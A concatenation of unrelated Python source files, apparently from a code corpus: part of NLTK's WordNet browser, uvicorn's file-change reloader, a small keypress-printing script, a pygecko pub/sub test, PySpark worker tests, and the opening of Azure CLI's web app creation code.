synset.also_sees()))
elif synset.pos() == wn.ADV:
# This is weird. adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.a
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = '''
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
'''
html_trailer = '''
</body>
</html>
'''
explanation = '''
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
'''
# HTML oriented functions
def _bold(txt): return '<b>%s</b>' % txt
def _center(txt): return '<center>%s</center>' % txt
def _hlev(n,txt): return '<h%d>%s</h%d>' % (n,txt,n)
def _italic(txt): return '<i>%s</i>' % txt
def _li(txt): return '<li>%s</li>' % txt
def pg(word, body):
'''
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
'''
return (html_header % word) + body + html_trailer
def _ul(txt): return '<ul>' + txt + '</ul>'
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold('<br>'*10 + '*'*10 + ' ' + txt + ' ' + '*'*10))
full_hyponym_cont_text = \
_ul(_li(_italic('(has full hyponym continuation)'))) + '\n'
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset, this can be
retrived via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
'''
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
'''
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = 'S'
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = '<li>%s (%s) ' % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace('_', ' ')
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ', '.join(format_lemma(l.name()) for l in synset.lemmas())
gl = " (%s) <i>%s</i> " % \
(synset.definition(),
"; ".join("\"%s\"" % e for e in synset.examples()))
return s + gl + _synset_relations(word, synset, synset_relations) + '</li>\n'
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return '<ul>%s\n</ul>\n' % \
''.join((_collect_one_synset(word, synset, synset_relations)
for synset
in wn.synsets(word, pos)))
def _synset_relations(word, synset, synset_relations):
'''
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
'''
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % \
(relation_html(r[0]),
''.join('<li>%s</li>\n' % relation_html(sr) for sr in r[1]))
else:
raise TypeError("r must be a synset, lemma or list, it was: type(r) = %s, r = %s" % (type(r), r))
def make_synset_html(db_name, disp_name, rels):
synset_html = '<i>%s</i>\n' % \
make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name)
if db_name in ref.synset_relations[synset.name()]:
synset_html += '<ul>%s</ul>\n' % \
''.join("<li>%s</li>\n" % relation_html(r) for r in rels)
return synset_html
html = '<ul>' + \
'\n'.join(("<li>%s</li>" % make_synset_html(*rel_data) for rel_data
in get_relations_data(word, synset)
if rel_data[2] != [])) + \
'</ul>'
return html
class Reference(object):
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifaiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return a HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
'''
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
'''
word = href.word
pos_forms = defaultdict(list)
words = word.split(',')
words = [w for w in [w.strip().lower().replace(' ', '_')
for w in words]
if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ''
for pos,pos_str,name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + '\n'
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return \
"""
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page,
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = \
"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2018 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = "<a href=\"SHUTDOWN THE SERVER\">Shutdown</a>"
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(argv[1:], "l:p:sh",
["logfile=", "port=", "server-mode", "help"])
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == '__main__':
app()
__all__ = ['app']
|
statreload.py | import logging
import multiprocessing
import os
import signal
import sys
import time
from pathlib import Path
import click
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
logger = logging.getLogger("uvicorn.error")
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
def get_subprocess(self, target, kwargs):
spawn = multiprocessing.get_context("spawn")
try:
fileno = sys.stdin.fileno()
except OSError:
fileno = None
return spawn.Process(
target=self.start_subprocess, args=(target, fileno), kwargs=kwargs
)
def start_subprocess(self, target, fd_stdin, **kwargs):
if fd_stdin is not None:
sys.stdin = os.fdopen(fd_stdin)
self.config.configure_logging()
target(**kwargs)
def run(self, target, **kwargs):
pid = str(os.getpid())
message = "Started reloader process [{}]".format(pid)
color_message = "Started reloader process [{}]".format(
click.style(pid, fg="cyan", bold=True)
)
logger.info(message, extra={"color_message": color_message})
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
process = self.get_subprocess(target, kwargs=kwargs)
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.3)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = self.get_subprocess(target, kwargs=kwargs)
process.start()
self.reload_count += 1
message = "Stopping reloader process [{}]".format(pid)
color_message = "Stopping reloader process [{}]".format(
click.style(pid, fg="cyan", bold=True)
)
logger.info(message, extra={"color_message": color_message})
def clear(self):
self.mtimes = {}
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
except OSError as exc: # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
logger.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
|
prova.py | import threading, time
from msvcrt import getch
key = "lol"
def thread1():
global key
lock = threading.Lock()
while True:
with lock:
key = getch()
threading.Thread(target = thread1).start()
while True:
time.sleep(0.001)
print(key) |
collector-test.py | #!/usr/bin/env python3
from __future__ import print_function, division
# from the_collector import BagReader, BagWriter
# fix path for now
import sys
sys.path.append("../")
from the_collector.messages import Messages
from the_collector.messages import Vector
from the_collector.messages import IMU
from pygecko.transport import Pub, Sub
from pygecko.transport import zmqTCP, GeckoCore
import multiprocessing as mp
import time
def publisher(e, topic):
mm = Messages()
p = Pub(pack=mm.serialize)
addr = zmqTCP('localhost', 9998)
p.connect(addr)
name = mp.current_process().name
try:
cnt = 0
while e.is_set():
msg = IMU(Vector(1,2,3),Vector(1,2,3),Vector(1,2,3))
p.pub(topic, msg) # topic msg
cnt += 1
print(name, 'published msg on', topic)
time.sleep(1)
except Exception:
pass
print("*"*30)
print('*** {} pub bye'.format(name))
print("*"*30)
def subscriber(e, topic):
mm = Messages()
s = Sub(topics=[topic], unpack=mm.deserialize)
addr = zmqTCP('localhost', 9999)
s.connect(addr)
name = mp.current_process().name
try:
while e.is_set():
t, msg = s.recv()
# print(s.recv(flags=zmq.NOBLOCK))
# print("recv[{}]: {}".format(*s.recv()))
# print(name, 'recvd message')
print('{} recvd[{}] message'.format(name, t, msg))
except Exception as e:
print(e)
pass
print("*"*30)
print('*** {} Sub bye'.format(name))
print("*"*30)
if __name__ == '__main__':
e = mp.Event()
e.set()
core = GeckoCore()
procs = []
p = mp.Process(target=publisher, args=(e, 'bob'), name='bob-publisher')
p.start()
procs.append(p)
p = mp.Process(target=publisher, args=(e, 'sally'), name='sally-publisher')
p.start()
procs.append(p)
p = mp.Process(target=subscriber, args=(e, 'bob'), name='bob-subscriber')
p.start()
procs.append(p)
p = mp.Process(target=subscriber, args=(e, 'sally'), name='sally-1-subscriber')
p.start()
procs.append(p)
p = mp.Process(target=subscriber, args=(e, 'sally'), name='sally-2-subscriber')
p.start()
procs.append(p)
# def signal_handler(signalnum, stackframe):
# print('ctrl-c signal.')
# e.clear()
# sys.exit(0)
#
# # kill -l
# signal.signal(signal.SIGINT, signal_handler)
# signal.signal(signal.SIGTERM, signal_handler)
for _ in range(5):
try:
time.sleep(1)
except KeyboardInterrupt:
print('ctrl-c')
break
e.clear()
time.sleep(1)
for p in procs:
print("<<< killing {} {} >>>".format(p.name, p.pid))
p.join(1)
# if you kill the publisher before the subscriber, the sub gets stuck
# because recv() is blocking
if p.is_alive():
print('Crap, {} is still alive, terminate!'.format(p.name))
p.terminate()
p.join(0.1)
core.join(1)
exit()
|
test_worker.py | # -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark import SparkConf, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
if sys.version_info[0] >= 3:
xrange = range
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
try:
def f():
raise Exception("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
if sys.version_info.major < 3:
# we have to use unicode here to avoid UnicodeDecodeError
self.assertRegexpMatches(unicode(e).encode("utf-8"), "exception with 中")
else:
self.assertRegexpMatches(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_xrange(self):
rdd = self.sc.parallelize(xrange(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module,
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module; however, not found.")
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(xrange(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
